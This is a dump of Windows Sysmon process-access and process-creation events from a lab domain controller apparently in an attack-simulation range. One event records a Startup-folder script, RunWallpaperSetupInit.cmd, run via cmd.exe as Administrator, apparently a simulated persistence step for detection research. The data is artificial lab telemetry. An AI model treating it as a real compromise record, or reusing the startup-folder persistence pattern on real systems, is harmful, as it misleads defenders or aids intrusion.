10341000x800000000000000013301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9415-6005-1005-00000000A301}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9415-6005-1005-00000000A301}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.523{59A5CD1D-9415-6005-1005-00000000A301}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.976{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.976{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.960{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.960{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.960{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-93FA-6005-FC04-00000000A301}37846292C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\Explorer.EXE+91a26|C:\Windows\Explorer.EXE+11a0b|C:\Windows\Explorer.EXE+1187e|C:\Windows\Explorer.EXE+f7c2|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000013343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.946{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000013342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.820{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.804{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.804{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.804{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+d1597|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952AF645)|UNKNOWN(FFFFD3D9952B2488)|UNKNOWN(FFFFD3D9952B6879)|UNKNOWN(FFFFD3D9952B73A3)|UNKNOWN(FFFFD3D9952A9320)|UNKNOWN(FFFFD3D9952A77DB)|UNKNOWN(FFFFD3D99522902A)|UNKNOWN(FFFFD3D9952A83D3)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+1524 10341000x800000000000000013334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+d141d|C:\Windows\System32\SHELL32.dll+d1ac3|C:\Windows\System32\SHELL32.dll+d19f4|C:\Windows\System32\SHELL32.dll+d12a2|C:\Windows\SYSTEM32\IEFRAME.dll+11dd18|C:\Windows\SYSTEM32\IEFRAME.dll+d77d2|C:\Windows\SYSTEM32\IEFRAME.dll+d9f4e|C:\Windows\SYSTEM32\IEFRAME.dll+da7d4|C:\Windows\SYSTEM32\IEFRAME.dll+6851e|C:\Windows\SYSTEM32\IEFRAME.dll+de9b1|C:\Windows\SYSTEM32\IEFRAME.dll+d0abd|C:\Windows\SYSTEM32\IEFRAME.dll+d1939|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8 10341000x800000000000000013331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+d1399|C:\Windows\System32\SHELL32.dll+d1ac3|C:\Windows\System32\SHELL32.dll+d19f4|C:\Windows\System32\SHELL32.dll+d12a2|C:\Windows\SYSTEM32\IEFRAME.dll+11dd18|C:\Windows\SYSTEM32\IEFRAME.dll+d77d2|C:\Windows\SYSTEM32\IEFRAME.dll+d9f4e|C:\Windows\SYSTEM32\IEFRAME.dll+da7d4|C:\Windows\SYSTEM32\IEFRAME.dll+6851e|C:\Windows\SYSTEM32\IEFRAME.dll+de9b1|C:\Windows\SYSTEM32\IEFRAME.dll+d0abd|C:\Windows\SYSTEM32\IEFRAME.dll+d1939|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8 10341000x800000000000000013330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d137d|C:\Windows\System32\SHELL32.dll+d1ac3|C:\Windows\System32\SHELL32.dll+d19f4|C:\Windows\System32\SHELL32.dll+d12a2|C:\Windows\SYSTEM32\IEFRAME.dll+11dd18|C:\Windows\SYSTEM32\IEFRAME.dll+d77d2|C:\Windows\SYSTEM32\IEFRAME.dll+d9f4e|C:\Windows\SYSTEM32\IEFRAME.dll+da7d4|C:\Windows\SYSTEM32\IEFRAME.dll+6851e|C:\Windows\SYSTEM32\IEFRAME.dll+de9b1|C:\Windows\SYSTEM32\IEFRAME.dll+d0abd|C:\Windows\SYSTEM32\IEFRAME.dll+d1939|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4